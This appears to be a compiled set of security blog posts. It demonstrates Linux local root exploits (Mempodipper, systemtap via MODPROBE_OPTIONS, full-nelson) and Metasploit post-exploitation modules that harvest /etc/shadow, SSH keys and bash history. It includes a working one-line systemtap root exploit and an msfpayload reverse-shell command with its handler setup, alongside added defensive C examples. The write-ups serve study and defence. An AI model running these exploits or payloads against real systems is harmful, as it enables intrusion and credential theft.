CVE-2012-0056 Mempodipper Linux Local Root Exploit Demo

Timeline :

Vulnerability discovered by zx2c4 (Jason A. Donenfeld)
Public release of the vulnerability on 2012-01-18
Exploit provided on 2012-01-23

PoC provided by :

zx2c4 (Jason A. Donenfeld)

Reference(s) :

CVE-2012-0056
EBD-ID-18411

Affected version(s) :

Linux kernels 2.6.39 and above (32-bit or 64-bit).

Tested on Ubuntu 11.10 with :

Linux ubuntu 3.0.0-15-generic

Description :

Mempodipper is an exploit for CVE-2012-0056, an issue in the handling of writes to /proc/pid/mem, where permissions were not properly checked in Linux kernel versions 2.6.39 to current. A local, unprivileged user could use this flaw to escalate their privileges.

Commands :

whoami
gcc -o CVE-2012-0056-Mempodipper CVE-2012-0056-Mempodipper.c
./CVE-2012-0056-Mempodipper
whoami

Metasploit Linux Post Exploitation : Enumeration and Hash Dump

A new set of post exploitation scripts has been developed and integrated into the Metasploit framework repository. These scripts let you gather interesting information from a Linux target.

These Metasploit post exploitation scripts normally support all Linux distributions. For the moment they only work with a “shell” session, but the Metasploit team is working on a version that fully integrates with Meterpreter.

Linux enum_linux post exploitation script

This script lets you gather different data from the target :

  • Hostname of the target.
  • Current running system user.
  • Linux distribution and version.
  • Complete running kernel version.
  • Complete list of system users from “/etc/passwd”.
  • Network configuration from the “/sbin/ifconfig -a” command.
  • Routing configuration from the “/sbin/route” command.
  • List of all mounted drives from the “/bin/mount -l” command.
  • Complete “iptables -L” command output. The “nat” and “mangle” tables are also gathered with the “iptables -L -t nat” and “iptables -L -t mangle” commands.
  • DNS configuration from “/etc/resolv.conf”.
  • SSH server configuration from “/etc/ssh/sshd_config”.
  • Static host entries from “/etc/hosts”.
  • Complete content of the “/etc/passwd” file.
  • Possible SSH keys located in “.ssh” folders across the entire system.
  • Installed software: “rpm -qa” for Fedora, Red Hat, SuSE, Mandrake and Oracle; “ls /var/log/packages” for Slackware; “dpkg -l” for Ubuntu and Debian; “equery list” for Gentoo; “/usr/bin/pacman -Q” for Arch Linux.
  • Installed services: “chkconfig --list” for Fedora, Red Hat, SuSE, Mandrake and Oracle; some logfu commands for Mandrake; “/usr/bin/service --status-all” for Ubuntu and Debian; “/bin/rc-status --all” for Gentoo.
  • Possible “.bash_history” files located in each user’s home folder.
  • The module will also try to take a screenshot of display “0:0” with the xwd command.

All this data is transferred to your Metasploit box for further analysis. All gathered information is saved into a “loot/date” folder located in your “$HOME/.msf3” folder.


Linux enum_packages post exploitation script

This module is a sub module that only focuses on installed software: “rpm -qa” for Fedora, Red Hat, SuSE, Mandrake and Oracle; “ls /var/log/packages” for Slackware; “dpkg -l” for Ubuntu and Debian; “equery list” for Gentoo; “/usr/bin/pacman -Q” for Arch Linux.


Linux enum_services post exploitation script

This module is a sub module that only focuses on installed services: “chkconfig --list” for Fedora, Red Hat, SuSE, Mandrake and Oracle; some logfu commands for Mandrake; “/usr/bin/service --status-all” for Ubuntu and Debian; “/bin/rc-status --all” for Gentoo.


Linux hashdump post exploitation script

This module will gather the “/etc/passwd” and “/etc/shadow” files.


Linux enum_cron post exploitation script

This module will enumerate cron jobs for all users on the system by executing the command “crontab -u #{user} -l”, where “#{user}” is each user enumerated from the “/etc/passwd” file.


Linux checkvm post exploitation script

This module will attempt to determine whether the targeted system is running inside a virtual environment and will tell you which virtualization technology is used. This module supports detection of Hyper-V, VMware, VirtualBox, Xen, and QEMU/KVM. All information is gathered by looking for virtualization hints in the output of the “/sbin/lsmod”, “dmesg” and “cat /proc/scsi/scsi” commands.

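The same three-source check, written here as an added C example that is not the Metasploit module's code: it scans the outputs of lsmod, dmesg and cat /proc/scsi/scsi for hypervisor markers and returns the vendor, tolerating a missing output when one of the commands could not be run. The marker table and the sample outputs are assumptions constructed for the example.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Case-insensitive substring test (own helper; strcasestr is not portable). */
static int ci_contains(const char *hay, const char *needle) {
    size_t n = strlen(needle);
    for (const char *p = hay; *p; p++) {
        size_t i = 0;
        while (i < n && p[i] && tolower((unsigned char)p[i]) == tolower((unsigned char)needle[i]))
            i++;
        if (i == n)
            return 1;
    }
    return 0;
}

struct marker { const char *hint; const char *vendor; };

/* Strings each hypervisor leaves in module names (lsmod), the kernel log (dmesg)
   or SCSI vendor strings (/proc/scsi/scsi). The table is an assumption for this
   example, not the module's own list; specific markers come first so that
   "virtio" on a Xen guest does not mislabel it as QEMU/KVM. */
static const struct marker markers[] = {
    { "vboxguest", "VirtualBox" }, { "VirtualBox", "VirtualBox" }, { "VBOX", "VirtualBox" },
    { "vmw_", "VMware" },          { "vmxnet", "VMware" },         { "VMware", "VMware" },
    { "hv_vmbus", "Hyper-V" },     { "Hyper-V", "Hyper-V" },
    { "xen_", "Xen" },             { "Xen", "Xen" },
    { "virtio", "QEMU/KVM" },      { "QEMU", "QEMU/KVM" },         { "KVM", "QEMU/KVM" },
    { NULL, NULL }
};

/* Returns the hypervisor name, or "none"; any of the three outputs may be NULL. */
const char *detect_hypervisor(const char *lsmod_out, const char *dmesg_out, const char *scsi_out) {
    const char *sources[3] = { lsmod_out, dmesg_out, scsi_out };
    for (const struct marker *m = markers; m->hint; m++)
        for (size_t s = 0; s < 3; s++)
            if (sources[s] && ci_contains(sources[s], m->hint))
                return m->vendor;
    return "none";
}

int main(void) { /* constructed sample outputs, not captured from a real host */
    const char *lsmod = "Module   Size  Used by\nvboxguest  228863  2\n";
    printf("%s\n", detect_hypervisor(lsmod, NULL, NULL));
    printf("%s\n", detect_hypervisor("ext4 1\n", "Hypervisor detected: KVM\n", NULL));
    return 0;
}
```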

To test these scripts you only need to create an executable payload for Linux and follow these steps.

First, create the payload with msfpayload and upload it to the targeted Linux host.

sudo msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.178.21 LPORT=4444 X > test

Then, in msfconsole, run the following commands.

use exploit/multi/handler
set PAYLOAD linux/x86/shell_reverse_tcp
set LHOST 192.168.178.21
exploit -j

Finally, on the targeted Linux host, execute the test payload.

CVE-2010-4170 : systemtap Local Root Privilege Escalation Vulnerability

Timeline :

Vulnerability reported to vendors by Tavis Ormandy on 2010-11-15
Vulnerability corrected by vendors around 2010-11-17

PoC provided by :

Tavis Ormandy

Reference(s) :

CVE-2010-4170

Affected version(s) :

Red Hat, Fedora, Debian, Ubuntu, etc.

Tested on Debian squeeze/sid with :

systemtap-runtime_1.0-2_i386.deb

Description :

It was discovered that staprun did not properly sanitize the environment before executing the modprobe command to load an additional kernel module. A local, unprivileged user could use this flaw to escalate their privileges.

Commands :

Requires “systemtap-runtime” on Debian

id
printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever
id
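The fix for this class of bug is to give the privileged helper's child a freshly built environment instead of the caller's. The C below is an added example, not systemtap's own code: build_clean_env keeps a fixed PATH plus a short allowlist, so a caller's MODPROBE_OPTIONS never reaches modprobe. The allowlist and the hostile environment are constructed for the example.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Variables a privileged helper may pass through to its child; everything else,
   MODPROBE_OPTIONS in particular, is dropped. The list is an assumption here. */
static const char *const allowed[] = { "LANG", "TZ", NULL };

/* True if `entry` ("NAME=value") defines the variable `name`. */
static int name_is(const char *entry, const char *name) {
    size_t n = strlen(name);
    return strncmp(entry, name, n) == 0 && entry[n] == '=';
}

static int is_allowed(const char *entry) {
    for (const char *const *p = allowed; *p; p++)
        if (name_is(entry, *p)) return 1;
    return 0;
}

/* Builds a fresh NULL-terminated environment: a fixed PATH first, then only the
   allowlisted entries of envp_in. Free the result with free_env(). */
char **build_clean_env(char *const *envp_in) {
    size_t count = 0, i = 0;
    for (char *const *e = envp_in; *e; e++)
        if (is_allowed(*e)) count++;
    char **out = calloc(count + 2, sizeof *out);
    if (!out) return NULL;
    out[i++] = strdup("PATH=/usr/sbin:/usr/bin:/sbin:/bin");
    for (char *const *e = envp_in; *e; e++)
        if (is_allowed(*e)) out[i++] = strdup(*e);
    out[i] = NULL;
    return out;
}

void free_env(char **envp) {
    for (char **e = envp; *e; e++) free(*e);
    free(envp);
}

int main(void) { /* constructed caller environment, as the exploit above sets it up */
    char *hostile[] = { "MODPROBE_OPTIONS=-C exploit.conf", "PATH=/tmp:/usr/bin", "LANG=C", NULL };
    char **clean = build_clean_env(hostile); /* the weak form would execve with `hostile` */
    for (char **e = clean; *e; e++) puts(*e);
    free_env(clean);
    return 0;
}
```

The hardened helper then calls execve("/sbin/modprobe", argv, clean) rather than inheriting the caller's environ.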

full-nelson.c Linux Kernel local privilege escalation

Timeline :

CVE-2010-3849 reported by Nelson Elhage on 2010-10-18
CVE-2010-3850 reported by Nelson Elhage on 2010-10-18
CVE-2010-4258 reported by Nelson Elhage on 2010-12-02

PoC provided by :

Dan Rosenberg
Nelson Elhage

Reference(s) :

CVE-2010-3849
CVE-2010-3850
CVE-2010-4258

Affected version(s) :

All Linux kernel versions prior to 2.6.37

Tested on Ubuntu 10.10 server

Description :

This exploit leverages three vulnerabilities to get root, all of which were discovered by Nelson Elhage.

Commands :

uname -a
id
gcc full-nelson.c -o full-nelson
./full-nelson
id